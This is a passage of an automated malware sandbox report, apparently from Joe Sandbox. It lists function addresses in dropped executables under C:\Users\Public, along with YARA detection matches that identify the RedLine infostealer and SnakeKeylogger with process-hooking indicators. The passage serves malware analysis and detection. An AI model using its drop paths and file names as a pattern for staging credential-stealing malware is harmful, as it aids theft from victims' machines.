              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D005E07_2_00007FF792D005E0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DF85EC7_2_00007FF792DF85EC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DE85A87_2_00007FF792DE85A8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D425807_2_00007FF792D42580
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D8E57C7_2_00007FF792D8E57C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D5655C7_2_00007FF792D5655C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D285707_2_00007FF792D28570
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC45387_2_00007FF792DC4538
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792CFC5207_2_00007FF792CFC520
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D6C6F87_2_00007FF792D6C6F8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D5C6D07_2_00007FF792D5C6D0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DBC6307_2_00007FF792DBC630
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D586307_2_00007FF792D58630
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D3CBFC7_2_00007FF792D3CBFC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792CFAC087_2_00007FF792CFAC08
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D68BD47_2_00007FF792D68BD4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DA6B947_2_00007FF792DA6B94
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D14B687_2_00007FF792D14B68
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D44B307_2_00007FF792D44B30
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D82CF87_2_00007FF792D82CF8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D08D007_2_00007FF792D08D00
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D4CD107_2_00007FF792D4CD10
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DE8CF47_2_00007FF792DE8CF4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D8CCA87_2_00007FF792D8CCA8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D6CC807_2_00007FF792D6CC80
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DFCC8C7_2_00007FF792DFCC8C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC8C587_2_00007FF792DC8C58
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D40C287_2_00007FF792D40C28
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7AA007_2_00007FF792D7AA00
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D509EC7_2_00007FF792D509EC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DCA9F07_2_00007FF792DCA9F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D5E9F07_2_00007FF792D5E9F0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D569847_2_00007FF792D56984
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D489907_2_00007FF792D48990
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792CF29407_2_00007FF792CF2940
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7EA7C7_2_00007FF792D7EA7C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D76A847_2_00007FF792D76A84
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DDAA587_2_00007FF792DDAA58
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DE4A587_2_00007FF792DE4A58
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DC4A407_2_00007FF792DC4A40
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D94F947_2_00007FF792D94F94
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D24F907_2_00007FF792D24F90
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D18F1C7_2_00007FF792D18F1C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D0B09C7_2_00007FF792D0B09C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D3107C7_2_00007FF792D3107C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D4D0947_2_00007FF792D4D094
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792CF10307_2_00007FF792CF1030
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D1EDA47_2_00007FF792D1EDA4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D66D7C7_2_00007FF792D66D7C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DD2D6C7_2_00007FF792DD2D6C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D52D187_2_00007FF792D52D18
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D48D2C7_2_00007FF792D48D2C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792CF6EF47_2_00007FF792CF6EF4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D2EED47_2_00007FF792D2EED4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DD8EAC7_2_00007FF792DD8EAC
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DD4E587_2_00007FF792DD4E58
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_028F20C410_2_028F20C4
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB13785411_2_00007FF7AB137854
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB12341011_2_00007FF7AB123410
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB1337D811_2_00007FF7AB1337D8
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB12AA5411_2_00007FF7AB12AA54
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB13555411_2_00007FF7AB135554
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB128DF811_2_00007FF7AB128DF8
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB122C4811_2_00007FF7AB122C48
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB14AC4C11_2_00007FF7AB14AC4C
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB12188411_2_00007FF7AB121884
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB1318D411_2_00007FF7AB1318D4
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB12851011_2_00007FF7AB128510
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB12B0D811_2_00007FF7AB12B0D8
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB129B5011_2_00007FF7AB129B50
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB12372C11_2_00007FF7AB12372C
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB123F9011_2_00007FF7AB123F90
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB125B7011_2_00007FF7AB125B70
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB14AFBC11_2_00007FF7AB14AFBC
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB126BE011_2_00007FF7AB126BE0
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB12524011_2_00007FF7AB125240
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB12765011_2_00007FF7AB127650
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB12D25011_2_00007FF7AB12D250
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB129E5011_2_00007FF7AB129E50
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB12222011_2_00007FF7AB122220
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB13422411_2_00007FF7AB134224
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB124A3011_2_00007FF7AB124A30
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB14AA3011_2_00007FF7AB14AA30
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB12E68011_2_00007FF7AB12E680
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB14EE8811_2_00007FF7AB14EE88
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB130A6C11_2_00007FF7AB130A6C
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB147F0011_2_00007FF7AB147F00
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB126EE411_2_00007FF7AB126EE4
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB15153811_2_00007FF7AB151538
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB127D3011_2_00007FF7AB127D30
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB14D9D011_2_00007FF7AB14D9D0
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB1281D411_2_00007FF7AB1281D4
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB12CE1011_2_00007FF7AB12CE10
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB13785412_2_00007FF7AB137854
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB12341012_2_00007FF7AB123410
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB1337D812_2_00007FF7AB1337D8
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB12AA5412_2_00007FF7AB12AA54
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB13555412_2_00007FF7AB135554
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB128DF812_2_00007FF7AB128DF8
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB122C4812_2_00007FF7AB122C48
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB14AC4C12_2_00007FF7AB14AC4C
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB12188412_2_00007FF7AB121884
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB1318D412_2_00007FF7AB1318D4
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB12851012_2_00007FF7AB128510
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB12B0D812_2_00007FF7AB12B0D8
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB129B5012_2_00007FF7AB129B50
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB12372C12_2_00007FF7AB12372C
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB123F9012_2_00007FF7AB123F90
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB125B7012_2_00007FF7AB125B70
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB14AFBC12_2_00007FF7AB14AFBC
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB126BE012_2_00007FF7AB126BE0
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB12524012_2_00007FF7AB125240
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB12765012_2_00007FF7AB127650
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB12D25012_2_00007FF7AB12D250
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB129E5012_2_00007FF7AB129E50
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB12222012_2_00007FF7AB122220
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB13422412_2_00007FF7AB134224
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB124A3012_2_00007FF7AB124A30
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB14AA3012_2_00007FF7AB14AA30
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB12E68012_2_00007FF7AB12E680
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB14EE8812_2_00007FF7AB14EE88
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB130A6C12_2_00007FF7AB130A6C
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB147F0012_2_00007FF7AB147F00
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB126EE412_2_00007FF7AB126EE4
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB15153812_2_00007FF7AB151538
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB127D3012_2_00007FF7AB127D30
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB14D9D012_2_00007FF7AB14D9D0
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB1281D412_2_00007FF7AB1281D4
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB12CE1012_2_00007FF7AB12CE10
              Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\xzeheenC.pif BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: String function: 028F46A4 appears 244 times
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: String function: 029087A0 appears 54 times
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: String function: 02908824 appears 45 times
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: String function: 028F44AC appears 73 times
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: String function: 028F480C appears 931 times
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: String function: 028F44D0 appears 32 times
              Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF7AB13498C appears 40 times
              Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF7AB133448 appears 72 times
              Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF7AB13081C appears 36 times
              Source: C:\Users\Public\kn.exeCode function: String function: 00007FF792DB0D10 appears 181 times
              Source: C:\Users\Public\kn.exeCode function: String function: 00007FF792DAABFC appears 818 times
              Source: C:\Users\Public\kn.exeCode function: String function: 00007FF792DFF1B8 appears 183 times
              Source: C:\Users\Public\kn.exeCode function: String function: 00007FF792DFF11C appears 37 times
              Source: C:\Users\Public\kn.exeCode function: String function: 00007FF792D2BC9C appears 280 times
              Source: C:\Users\Public\kn.exeCode function: String function: 00007FF792DB7BAC appears 34 times
              Source: C:\Users\Public\kn.exeCode function: String function: 00007FF792CFD1C8 appears 41 times
              Source: C:\Users\Public\kn.exeCode function: String function: 00007FF792E064A6 appears 173 times
              Source: C:\Users\Public\kn.exeCode function: String function: 00007FF792DB7D70 appears 35 times
              Source: C:\Users\Public\kn.exeCode function: String function: 00007FF792D8EB98 appears 93 times
              Source: 16.2.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 22.2.xzeheenC.pif.33966478.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.2.xzeheenC.pif.33966478.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 16.2.xzeheenC.pif.2b37c896.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.2.xzeheenC.pif.2b37c896.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 16.2.xzeheenC.pif.2dcd0f08.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.2.xzeheenC.pif.2dcd0f08.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 26.2.xzeheenC.pif.226c0f08.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.2.xzeheenC.pif.226c0f08.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 22.2.xzeheenC.pif.34ca0f08.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.2.xzeheenC.pif.34ca0f08.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 16.2.xzeheenC.pif.2dcd0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.2.xzeheenC.pif.2dcd0000.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 22.2.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 16.3.xzeheenC.pif.2991aba0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.3.xzeheenC.pif.2991aba0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 16.2.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 16.2.xzeheenC.pif.2c596478.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.2.xzeheenC.pif.2c596478.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 26.2.xzeheenC.pif.25170000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.2.xzeheenC.pif.25170000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 16.2.xzeheenC.pif.2c5ce790.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.2.xzeheenC.pif.2c5ce790.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 26.2.xzeheenC.pif.226c0000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.2.xzeheenC.pif.226c0000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 16.2.xzeheenC.pif.2e330000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.2.xzeheenC.pif.2e330000.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 26.2.xzeheenC.pif.222bb98e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.2.xzeheenC.pif.222bb98e.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 22.1.xzeheenC.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 16.2.xzeheenC.pif.2dcd0000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 16.2.xzeheenC.pif.2dcd0000.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 22.2.xzeheenC.pif.34ca0000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.2.xzeheenC.pif.34ca0000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 22.2.xzeheenC.pif.34d20000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.2.xzeheenC.pif.34d20000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 22.2.xzeheenC.pif.3255b98e.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.2.xzeheenC.pif.3255b98e.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 22.2.xzeheenC.pif.3255c896.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 22.2.xzeheenC.pif.3255c896.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 26.2.xzeheenC.pif.222bc896.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 26.2.xzeheenC.pif.222bc896.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
              Source: 22.2.xzeheenC.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
